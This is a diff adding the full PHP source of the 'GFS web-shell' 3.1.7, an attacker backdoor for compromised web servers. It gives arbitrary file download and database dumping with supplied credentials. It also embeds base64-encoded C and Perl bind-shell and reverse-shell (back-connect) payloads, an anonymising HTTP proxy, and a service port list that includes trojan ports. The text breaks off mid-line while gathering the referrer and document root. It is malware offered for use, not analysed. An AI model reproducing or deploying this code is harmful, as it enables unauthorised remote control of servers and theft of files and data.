+* ## #### ###### * +* ## ## #### ###### * +* ## ## ## ## * +* ###### ## ###### * +* ###### ## ###### * +* * +* Group Freedom Search! * +************************* +GFS Web-Shell +*/ +error_reporting(0); +if($_POST['b_down']){ + $file=fopen($_POST['fname'],"r"); + ob_clean(); + $filename=basename($_POST['fname']); + $filedump=fread($file,filesize($_POST['fname'])); + fclose($file); + header("Content-type: application/octet-stream"); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); +} +if($_POST['b_dtable']){ + $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + if($dump!=""){ + header("Content-type: application/octet-stream"); + header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";"); + echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + exit(); + }else + die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']); +} +set_magic_quotes_runtime(0); +set_time_limit(0); +ini_set('max_execution_time',0); +ini_set('output_buffering',0); +if(version_compare(phpversion(), '4.1.0')==-1){ + $_POST=&$HTTP_POST_VARS; + $_GET=&$HTTP_GET_VARS; + $_SERVER=&$HTTP_SERVER_VARS; +} +if (get_magic_quotes_gpc()){ + foreach ($_POST as $k=>$v){ + $_POST[$k]=stripslashes($v); + } + foreach ($_SERVER as $k=>$v){ + $_SERVER[$k]=stripslashes($v); + } +} +if ($_POST['username']==""){ + $_POST['username']="root"; +} +//////////////////////////////////////////////////////////////////////////////// +///////////////////////////// دهًهىهييûه /////////////////////////////////////// +//////////////////////////////////////////////////////////////////////////////// +$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; +$r_act=$_POST['r_act']; +$safe_mode=ini_get('safe_mode'); //ٌٍàٌٍَ لهçîïàٌيîمî ًهوèىà +$mysql_stat=function_exists('mysql_connect'); //حàëè÷èه mysql +$curl_on=function_exists('curl_version'); //يàëè÷èه cURL +$dis_func=ini_get('disable_functions'); //çàلëîêèًîâàيûه ôَيêِèè +$HTML=<<<html +<html> +<head> +<title>GFS web-shell ver 3.1.7</title> +</head> +<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> +html; +$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9 +MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4 +gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG +ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc +mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1 +LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI="; +$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk +X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR +TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE +FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ +W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h +Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ +lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy +BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V +VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk +bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5 +lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi +BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS +VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN +CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk +7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG +ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd +XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+ +c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw +iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC +R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y +29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y +ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR +QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG +Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D +QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug +PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N +0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi +A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9"; +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; +$port[2] = "Management Utility"; +$port[3] = "Compression Process"; +$port[5] = "rje (Remote Job Entry)"; +$port[7] = "echo"; +$port[9] = "discard"; +$port[11] = "systat"; +$port[13] = "daytime"; +$port[15] = "netstat"; +$port[17] = "quote of the day"; +$port[18] = "send/rwp"; +$port[19] = "character generator"; +$port[20] = "ftp-data"; +$port[21] = "ftp"; +$port[22] = "ssh, pcAnywhere"; +$port[23] = "Telnet"; +$port[25] = "SMTP (Simple Mail Transfer)"; +$port[27] = "ETRN (NSW User System FE)"; +$port[29] = "MSG ICP"; +$port[31] = "MSG Authentication"; +$port[33] = "dsp (Display Support Protocol)"; +$port[37] = "time"; +$port[38] = "RAP (Route Access Protocol)"; +$port[39] = "rlp (Resource Location Protocol)"; +$port[41] = "Graphics"; +$port[42] = "nameserv, WINS"; +$port[43] = "whois, nickname"; +$port[44] = "MPM FLAGS Protocol"; +$port[45] = "Message Processing Module [recv]"; +$port[46] = "MPM [default send]"; +$port[47] = "NI FTP"; +$port[48] = "Digital Audit Daemon"; +$port[49] = "TACACS, Login Host Protocol"; +$port[50] = "RMCP, re-mail-ck"; +$port[53] = "DNS"; +$port[57] = "MTP (any private terminal access)"; +$port[59] = "NFILE"; +$port[60] = "Unassigned"; +$port[61] = "NI MAIL"; +$port[62] = "ACA Services"; +$port[63] = "whois++"; +$port[64] = "Communications Integrator (CI)"; +$port[65] = "TACACS-Database Service"; +$port[66] = "Oracle SQL*NET"; +$port[67] = "bootps (Bootstrap Protocol Server)"; +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; +$port[69] = "Trivial File Transfer Protocol (tftp)"; +$port[70] = "Gopher"; +$port[71] = "Remote Job Service"; +$port[72] = "Remote Job Service"; +$port[73] = "Remote Job Service"; +$port[74] = "Remote Job Service"; +$port[75] = "any private dial out service"; +$port[76] = "Distributed External Object Store"; +$port[77] = "any private RJE service"; +$port[78] = "vettcp"; +$port[79] = "finger"; +$port[80] = "World Wide Web HTTP"; +$port[81] = "HOSTS2 Name Serve"; +$port[82] = "XFER Utility"; +$port[83] = "MIT ML Device"; +$port[84] = "Common Trace Facility"; +$port[85] = "MIT ML Device"; +$port[86] = "Micro Focus Cobol"; +$port[87] = "any private terminal link"; +$port[88] = "Kerberos, WWW"; +$port[89] = "SU/MIT Telnet Gateway"; +$port[90] = "DNSIX Securit Attribute Token Map"; +$port[91] = "MIT Dover Spooler"; +$port[92] = "Network Printing Protocol"; +$port[93] = "Device Control Protocol"; +$port[94] = "Tivoli Object Dispatcher"; +$port[95] = "supdup"; +$port[96] = "DIXIE"; +$port[98] = "linuxconf"; +$port[99] = "Metagram Relay"; +$port[100] = "[unauthorized use]"; +$port[101] = "HOSTNAME"; +$port[102] = "ISO, X.400, ITOT"; +$port[103] = "Genesis Point-to-Point"; +$port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; +$port[105] = "CCSO name server protocol"; +$port[106] = "poppassd"; +$port[107] = "Remote Telnet Service"; +$port[108] = "SNA Gateway Access Server"; +$port[109] = "POP2"; +$port[110] = "POP3"; +$port[111] = "Sun RPC Portmapper"; +$port[112] = "McIDAS Data Transmission Protocol"; +$port[113] = "Authentication Service"; +$port[115] = "sftp (Simple File Transfer Protocol)"; +$port[116] = "ANSA REX Notify"; +$port[117] = "UUCP Path Service"; +$port[118] = "SQL Services"; +$port[119] = "NNTP"; +$port[120] = "CFDP"; +$port[123] = "NTP"; +$port[124] = "SecureID"; +$port[129] = "PWDGEN"; +$port[133] = "statsrv"; +$port[135] = "loc-srv/epmap"; +$port[137] = "netbios-ns"; +$port[138] = "netbios-dgm (UDP)"; +$port[139] = "NetBIOS"; +$port[143] = "IMAP"; +$port[144] = "NewS"; +$port[150] = "SQL-NET"; +$port[152] = "BFTP"; +$port[153] = "SGMP"; +$port[156] = "SQL Service"; +$port[161] = "SNMP"; +$port[175] = "vmnet"; +$port[177] = "XDMCP"; +$port[178] = "NextStep Window Server"; +$port[179] = "BGP"; +$port[180] = "SLmail admin"; +$port[199] = "smux"; +$port[210] = "Z39.50"; +$port[213] = "IPX"; +$port[218] = "MPP"; +$port[220] = "IMAP3"; +$port[256] = "RAP"; +$port[257] = "Secure Electronic Transaction"; +$port[258] = "Yak Winsock Personal Chat"; +$port[259] = "ESRO"; +$port[264] = "FW1_topo"; +$port[311] = "Apple WebAdmin"; +$port[350] = "MATIP type A"; +$port[351] = "MATIP type B"; +$port[363] = "RSVP tunnel"; +$port[366] = "ODMR (On-Demand Mail Relay)"; +$port[371] = "Clearcase"; +$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; +$port[389] = "LDAP"; +$port[407] = "Timbuktu"; +$port[427] = "Server Location"; +$port[434] = "Mobile IP"; +$port[443] = "ssl"; +$port[444] = "snpp, Simple Network Paging Protocol"; +$port[445] = "SMB"; +$port[458] = "QuickTime TV/Conferencing"; +$port[468] = "Photuris"; +$port[475] = "tcpnethaspsrv"; +$port[500] = "ISAKMP, pluto"; +$port[511] = "mynet-as"; +$port[512] = "biff, rexec"; +$port[513] = "who, rlogin"; +$port[514] = "syslog, rsh"; +$port[515] = "lp, lpr, line printer"; +$port[517] = "talk"; +$port[520] = "RIP (Routing Information Protocol)"; +$port[521] = "RIPng"; +$port[522] = "ULS"; +$port[531] = "IRC"; +$port[543] = "KLogin, AppleShare over IP"; +$port[545] = "QuickTime"; +$port[548] = "AFP"; +$port[554] = "Real Time Streaming Protocol"; +$port[555] = "phAse Zero"; +$port[563] = "NNTP over SSL"; +$port[575] = "VEMMI"; +$port[581] = "Bundle Discovery Protocol"; +$port[593] = "MS-RPC"; +$port[608] = "SIFT/UFT"; +$port[626] = "Apple ASIA"; +$port[631] = "IPP (Internet Printing Protocol)"; +$port[635] = "RLZ DBase"; +$port[636] = "sldap"; +$port[642] = "EMSD"; +$port[648] = "RRP (NSI Registry Registrar Protocol)"; +$port[655] = "tinc"; +$port[660] = "Apple MacOS Server Admin"; +$port[666] = "Doom"; +$port[674] = "ACAP"; +$port[687] = "AppleShare IP Registry"; +$port[700] = "buddyphone"; +$port[705] = "AgentX for SNMP"; +$port[901] = "swat, realsecure"; +$port[993] = "s-imap"; +$port[995] = "s-pop"; +$port[1024] = "Reserved"; +$port[1025] = "network blackjack"; +$port[1062] = "Veracity"; +$port[1080] = "SOCKS"; +$port[1085] = "WebObjects"; +$port[1227] = "DNS2Go"; +$port[1243] = "SubSeven"; +$port[1338] = "Millennium Worm"; +$port[1352] = "Lotus Notes"; +$port[1381] = "Apple Network License Manager"; +$port[1417] = "Timbuktu Service 1 Port"; +$port[1418] = "Timbuktu Service 2 Port"; +$port[1419] = "Timbuktu Service 3 Port"; +$port[1420] = "Timbuktu Service 4 Port"; +$port[1433] = "Microsoft SQL Server"; +$port[1434] = "Microsoft SQL Monitor"; +$port[1477] = "ms-sna-server"; +$port[1478] = "ms-sna-base"; +$port[1490] = "insitu-conf"; +$port[1494] = "Citrix ICA Protocol"; +$port[1498] = "Watcom-SQL"; +$port[1500] = "VLSI License Manager"; +$port[1503] = "T.120"; +$port[1521] = "Oracle SQL"; +$port[1522] = "Ricardo North America License Manager"; +$port[1524] = "ingres"; +$port[1525] = "prospero"; +$port[1526] = "prospero"; +$port[1527] = "tlisrv"; +$port[1529] = "oracle"; +$port[1547] = "laplink"; +$port[1604] = "Citrix ICA, MS Terminal Server"; +$port[1645] = "RADIUS Authentication"; +$port[1646] = "RADIUS Accounting"; +$port[1680] = "Carbon Copy"; +$port[1701] = "L2TP/LSF"; +$port[1717] = "Convoy"; +$port[1720] = "H.323/Q.931"; +$port[1723] = "PPTP control port"; +$port[1731] = "MSICCP"; +$port[1755] = "Windows Media .asf"; +$port[1758] = "TFTP multicast"; +$port[1761] = "cft-0"; +$port[1762] = "cft-1"; +$port[1763] = "cft-2"; +$port[1764] = "cft-3"; +$port[1765] = "cft-4"; +$port[1766] = "cft-5"; +$port[1767] = "cft-6"; +$port[1808] = "Oracle-VP2"; +$port[1812] = "RADIUS server"; +$port[1813] = "RADIUS accounting"; +$port[1818] = "ETFTP"; +$port[1973] = "DLSw DCAP/DRAP"; +$port[1985] = "HSRP"; +$port[1999] = "Cisco AUTH"; +$port[2001] = "glimpse"; +$port[2049] = "NFS"; +$port[2064] = "distributed.net"; +$port[2065] = "DLSw"; +$port[2066] = "DLSw"; +$port[2106] = "MZAP"; +$port[2140] = "DeepThroat"; +$port[2301] = "Compaq Insight Management Web Agents"; +$port[2327] = "Netscape Conference"; +$port[2336] = "Apple UG Control"; +$port[2427] = "MGCP gateway"; +$port[2504] = "WLBS"; +$port[2535] = "MADCAP"; +$port[2543] = "sip"; +$port[2592] = "netrek"; +$port[2727] = "MGCP call agent"; +$port[2628] = "DICT"; +$port[2998] = "ISS Real Secure Console Service Port"; +$port[3000] = "Firstclass"; +$port[3001] = "Redwood Broker"; +$port[3031] = "Apple AgentVU"; +$port[3128] = "squid"; +$port[3130] = "ICP"; +$port[3150] = "DeepThroat"; +$port[3264] = "ccmail"; +$port[3283] = "Apple NetAssitant"; +$port[3288] = "COPS"; +$port[3305] = "ODETTE"; +$port[3306] = "mySQL"; +$port[3389] = "RDP Protocol (Terminal Server)"; +$port[3521] = "netrek"; +$port[4000] = "icq, command-n-conquer and shell nfm"; +$port[4321] = "rwhois"; +$port[4333] = "mSQL"; +$port[4444] = "KRB524"; +$port[4827] = "HTCP"; +$port[5002] = "radio free ethernet"; +$port[5004] = "RTP"; +$port[5005] = "RTP"; +$port[5010] = "Yahoo! Messenger"; +$port[5050] = "multimedia conference control tool"; +$port[5060] = "SIP"; +$port[5150] = "Ascend Tunnel Management Protocol"; +$port[5190] = "AIM"; +$port[5500] = "securid"; +$port[5501] = "securidprop"; +$port[5423] = "Apple VirtualUser"; +$port[5555] = "Personal Agent"; +$port[5631] = "PCAnywhere data"; +$port[5632] = "PCAnywhere"; +$port[5678] = "Remote Replication Agent Connection"; +$port[5800] = "VNC"; +$port[5801] = "VNC"; +$port[5900] = "VNC"; +$port[5901] = "VNC"; +$port[6000] = "X Windows"; +$port[6112] = "BattleNet"; +$port[6502] = "Netscape Conference"; +$port[6667] = "IRC"; +$port[6670] = "VocalTec Internet Phone, DeepThroat"; +$port[6699] = "napster"; +$port[6776] = "Sub7"; +$port[6970] = "RTP"; +$port[7007] = "MSBD, Windows Media encoder"; +$port[7070] = "RealServer/QuickTime"; +$port[7777] = "cbt"; +$port[7778] = "Unreal"; +$port[7648] = "CU-SeeMe"; +$port[7649] = "CU-SeeMe"; +$port[8000] = "iRDMI/Shoutcast Server"; +$port[8010] = "WinGate 2.1"; +$port[8080] = "HTTP"; +$port[8181] = "HTTP"; +$port[8383] = "IMail WWW"; +$port[8875] = "napster"; +$port[8888] = "napster"; +$port[8889] = "Desktop Data TCP 1"; +$port[8890] = "Desktop Data TCP 2"; +$port[8891] = "Desktop Data TCP 3: NESS application"; +$port[8892] = "Desktop Data TCP 4: FARM product"; +$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; +$port[8894] = "Desktop Data TCP 6: COAL application"; +$port[9000] = "CSlistener"; +$port[10008] = "cheese worm"; +$port[11371] = "PGP 5 Keyserver"; +$port[13223] = "PowWow"; +$port[13224] = "PowWow"; +$port[14237] = "Palm"; +$port[14238] = "Palm"; +$port[18888] = "LiquidAudio"; +$port[21157] = "Activision"; +$port[22555] = "Vocaltec Web Conference"; +$port[23213] = "PowWow"; +$port[23214] = "PowWow"; +$port[23456] = "EvilFTP"; +$port[26000] = "Quake"; +$port[27001] = "QuakeWorld"; +$port[27010] = "Half-Life"; +$port[27015] = "Half-Life"; +$port[27960] = "QuakeIII"; +$port[30029] = "AOL Admin"; +$port[31337] = "Back Orifice"; +$port[32777] = "rpc.walld"; +$port[45000] = "Cisco NetRanger postofficed"; +$port[32773] = "rpc bserverd"; +$port[32776] = "rpc.spray"; +$port[32779] = "rpc.cmsd"; +$port[38036] = "timestep"; +$port[40193] = "Novell"; +$port[41524] = "arcserve discovery"; +//////////////////////////////////////////////////////////////////////////////// +////////////////////////////////شسحتضبب///////////////////////////////////////// +/////////////////////////////////////////////////////////////////////////////// +function rep_char($ch,$count) //دîâٍîًهيèه ٌèىâîëà +{ + $res=""; + for($i=0; $i<=$count; ++$i){ + $res.=$ch.""; + } + return $res; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = 